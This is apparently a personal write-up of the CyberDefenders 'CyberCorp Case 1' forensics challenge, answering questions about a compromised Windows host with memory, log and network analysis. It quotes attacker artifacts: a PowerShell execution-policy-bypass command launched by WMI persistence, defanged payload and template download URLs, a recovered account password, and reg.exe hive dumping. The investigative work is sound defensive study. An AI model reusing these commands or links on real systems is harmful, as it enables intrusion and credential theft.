This is a write-up of the CyberCorp Case 1 challenge by CyberDefenders. The challenge can be found here.
CyberCorp company has been informed that its infrastructure is likely to be compromised, as there are a number of anomalies in its outgoing traffic. The anomalies suggest that a known threat group behind this attack.
CyberCorp’s Cybersecurity team isolated one of the potentially compromised hosts from the corporate network and collected artifacts necessary for the investigation: memory dump, OS event logs, registry files, Prefetch files, $MFT file, ShimCache, AmCache, network traffic dumps. You will have to analyze the collected artifacts and answer the questions to complete the investigation.
Tools used for this challenge
Question 1 - What is the build number (in the format ddddd, where each d is a single decimal number, for example - 12345) of the installed Windows version?
Every Windows version since 2000, will keep product version information in the Registry. To view this information you can use a tool like Registry Explorer.
The product version information including the build number is stored in the following key:
As shown below this key provides product version information, including the build number.
The currentbuild is: 17134
Question 2 - What is the parent process PID of the process, that accepts incoming network connections on the port 1900/UDP?
To answer this question, I’ve used Volatility 2.7 to find incoming network connections and to determine what the parent process is.
Before you can run Volatility commando’s, a correct profile for the memory image is needed. To find the profile a plugin called imageinfo was used.
vol.py -f memdump.mem imageinfo
Now that we got the profile, the netscan plugin was used to return all network connections. To filter the output for port 1900 grep was used.
vol.py -f memdump.mem --profile=Win10x64_17134 netscan | grep :1900.
All connections on port 1900 are coming from svchost.exe with the PID 4688. The parent process can be found by running the pstree module. This module will display the process listing in tree form. To search for the process with PID 4688 a grep filter was used.
vol.py -f memdump.mem --profile=Win10x64_17134 pstree | grep 4688
The output of this command shows the parent process of svchost.exe is 648
Question 3 - What is the IP address of the attacker command and control center, the connection with which was still active at the time of forensic artifacts acquisition?
While scrolling through the netscan output the following ESTABLISHED connection stood out:
TCPv4 192.168.184.130:50133 22.214.171.124:443 ESTABLISHED -1
This connection in combination with an entry in the Windows Event Logging shown below, made it clear the answer was: 126.96.36.199
Question 4 - What is the PID of the process where malicious code was located at the moment of forensic artifacts acquisition?
To answer this question the pstree output was analysed and some interesting processes were identified. Those processes were spawned by the parent process winlogon.exe.
This in combination with malicious code being embedded in the process made me think this was the correct answer.
The PID of winlogon.exe was the correct answer.
Question 5 - On a compromised system, malicious code, discovered in the previous step, is launched every system start, since the attacker has used one of the persistence techniques. So, what is the name of the autostart entry (those part, that is directly responsible for code execution), used by the attacker for persistence?
This question did take me some time. I was looking at all sort of persistence techniques, but forgot about WMI. While analysing the Windows Event Logs I noticed processes being created (EventID 4688) with the following command line:
powershell.exe -noP -ep bypass iex -c \"('C:\\Users\\john.goldberg\\AppData\\Roaming\\Microsoft\\Office\\Recent\\tmpA7Z2.ps1')
While looking deeper into this, I noticed a WMI CommandLineEventConsumer with the name: LogRotate Consumer using the same command line.
As shown in the picture above the script is launch every time the user entered his username and password. This technique was used by the Adversary to maintain persistence on the system.
Question 6 - The autostart entry from the previous step is used to launch the script, which in turn leads to the malicious code execution in the memory of the process, which is discussed in question 4. This code is extracted by script from some system place in the encoded form. The decoded value of this string is executable PE-file. How did Microsoft Antivirus detect this file on 2020-06-21?
This question was easy after completing question 8. The MD5 hash value was calculated and uploaded to VirtusTotal.
On VirusTotal it shows that Microsoft detects this file as Trojan:Win64/Meterpreter.E.
Question 7 - The process, mentioned in the question 4, isn’t the initial process, where malicious code, described in the previous question, was executed by script from autostart. What is the name of the initial process (in the format program.exe), that is spawned by autostart script and used for further malicious code execution, that subsequently migrates to the address space of the process, mentioned in the question 4.
Looking back at the pstree output from question 4, dwm.exe was identified as the answer.
Question 8 - The autostart entry from the previous step is used to launch the script, which in turn leads to the malicious code execution in the memory of the process, which is discussed in question 4. Provide the URL, which was used to download this script from the Internet during the host compromise. The script that runs at each system star (which is described in question 6) was downloaded to the compromised system from the Internet. Provide the URL, which was used to download this script
While working on question 11, a file named Supplement.dotm was found. To recover this file, a search was performed for .dotm with the filescan module. After the file was identified it was dumped with the dumpfile module.
Now I was left with a dotm.dat file. I decided to run olevbs which is a script to parse OLE and OpenXML files such as MS Office documents (e.g. Word, Excel), in order to extract VBA Macro code in clear text. Part of the output is shown in the picture below.
The output contained the answer to this question: https[:]//raw.githubusercontent[.]com/xia33F/APT/master/payloads/wrapper_page
Question 9 - The system was compromised as the result of a Microsoft Office document opening, received by email. What is MD5 hash of this document (for example, d41d8cd98f00b204e9800998ecf8427e)?
I started by looking for document files with the filescan module in Volatility. This gave me the below results:
I guess it’s going to be one of the above files. But, how do I receive them in order to calculate the hash value..? This took me a bit to figure out.
In Wireshark an export was created of all ELM files as shown in the picture below. All exported EML files were analysed and one e-mail (Oil Market current state.EML) had a zip file attached to it.
The base64 encoded block for the zip file was copied out of the e-mail headers. The base64 encoded block was decoded and the output saved to a file by using CyberChef. After changing the file extension of the output file to .zip, I was able to extract it’s content. This zip file contained a file named Why Saudi Arabia Will Lose The Next Oil Price Was.docx.
Next, PowerShell was used to calculate the hash value of this file:
Get-FileHash -Algorithm md5 'Why Saudi Arabia Will Lose The Next Oil Price Was.docx'
This gave the answer to this challenge: aa7ee7f712780aebe9136cabc24bf875
Question 10 - The document, that was initially opened by user, didn’t contain anything malicious itself. It downloaded another document from the Internet as a Microsoft Word template. Malicious code, which has led to the system compromise, is located inside this template directly. What link was used by the first document to download the second document as a template (for example, https://address/file.com)?
After successfully downloading the document in question 9, the next step was to run oletools against the document. This returned us with the answer to this question: http[:]//75.19.45[.]11/Supplement.dotm
Question 11 - During the post-exploitation attacker delivered to the compromised host a special Active Directory Enumeration utility. Which link did the attacker use to download this utility (for example, https://address/file.com)?
The answer to this question was found with a little bit of luck. At the start of this challenge I noticed Windows Event Logs in the evidence directory. The first thing I did is run the tool Chainsaw against it. Lately I’ve been using this tool a lot during IR investigations and would highly recommend it to anyone.
As shown in the picture above the Adverary used http://188.8.131.52/disco.jpg to download the utility.
Question 12 - As described in the previous question utility has created several files in the compromised system, that subsequently were deleted by an attacker. One of the created files had a bin extension. What is the name of this file (for example, name.bin)?
To answer this question the Master File Table (MFT) was analysed, since this is a database in which information about every file on a NTFS volume is kept. This was done by parsing the MFT file with EricZimmermans his MFT parser. Next, a filter was created on .bin and while scrolling through the results a strange file name was found in the temp directory.
Question 13 - During the post-exploitation attacker has compromised a privileged user account. What is its password?
As described earlier I’ve used ChainSaw to analyse the Windows Event Logging. The output of this tool shows the use of net use. The net use command is a Command Prompt command used to connect to, remove, and configure connections to shared resources, like mapped drives and network printers.
In this command the password is shown: !!feb15th2k6!!
Question 14 - What is the name of the tool (for example, program.exe), that probably was used by an attacker to compromise the user account?
The attacker used reg.exe to compromise the user account. The attacker saved the system registry hive to C:\Windows\TEMP\sa.tmp.
Question 15 - The attacker used a compromised account for unauthorized Domain Controller access. What is the IP address of this Domain Controller?
The answer for this question was found during question 13.
The answer is 192.168.184.100